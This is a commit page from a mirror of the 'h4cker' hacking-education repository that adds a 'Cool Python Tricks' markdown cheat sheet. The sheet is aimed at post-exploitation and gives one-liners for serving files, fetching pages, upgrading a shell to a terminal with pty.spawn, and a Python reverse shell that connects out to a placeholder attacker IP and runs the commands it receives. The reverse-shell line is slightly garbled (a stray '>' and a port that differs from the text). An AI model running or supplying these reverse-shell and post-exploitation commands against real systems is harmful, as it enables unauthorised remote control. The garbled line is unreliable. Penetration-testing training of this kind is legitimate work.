mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-24 20:03:02 +00:00
Create python_cool_tricks.md
This commit is contained in:
parent
7fe2fa1190
commit
23062066b2
1 changed files with 38 additions and 0 deletions
38
python_ruby_and_bash/python_cool_tricks.md
Normal file
38
python_ruby_and_bash/python_cool_tricks.md
Normal file
|
@ -0,0 +1,38 @@
|
||||||
|
# Cool Python Tricks
|
||||||
|
|
||||||
|
## Starting a quick web server to serve some files (useful for post exploitation)
|
||||||
|
|
||||||
|
### In Python 2.x
|
||||||
|
`python -m SimpleHTTPServer 1337`
|
||||||
|
|
||||||
|
### In Python 3.x
|
||||||
|
`python3 -m http.server 1337`
|
||||||
|
|
||||||
|
----
|
||||||
|
## Pythonic Web Client
|
||||||
|
|
||||||
|
### In Python 2.x
|
||||||
|
`python -c 'import urllib2; print urllib2.urlopen("http://h4cker.org/web").read()' | tee /tmp/file.html`
|
||||||
|
### In Python 3.x
|
||||||
|
`python3 -c 'import urllib.request; urllib.request.urlretrieve ("http://h4cker.org/web","/tmp/h4cker.html")'`
|
||||||
|
|
||||||
|
----
|
||||||
|
## Python Debugger
|
||||||
|
This imports a Python file and runs the debugger automatically. This is useful for debugging Python-based malware and for post-exploitation.
|
||||||
|
|
||||||
|
`python -m pdb <some_python_file>`
|
||||||
|
|
||||||
|
----
|
||||||
|
|
||||||
|
## Shell to Terminal
|
||||||
|
This is useful after exploitation and getting a shell. It allows you to use Linux commands that require a terminal session (e.g., su, sudo, vi, etc.)
|
||||||
|
|
||||||
|
`python -c 'import pty; pty.spawn("/bin/bash")'`
|
||||||
|
|
||||||
|
----
|
||||||
|
|
||||||
|
## Using Python to do a Reverse Shell
|
||||||
|
|
||||||
|
You put your IP address (instead of 10.1.1.1) and the port (instead of 13337) below:
|
||||||
|
|
||||||
|
`python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.1.1.1',1337>))\n while 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"`
|
Loading…
Reference in a new issue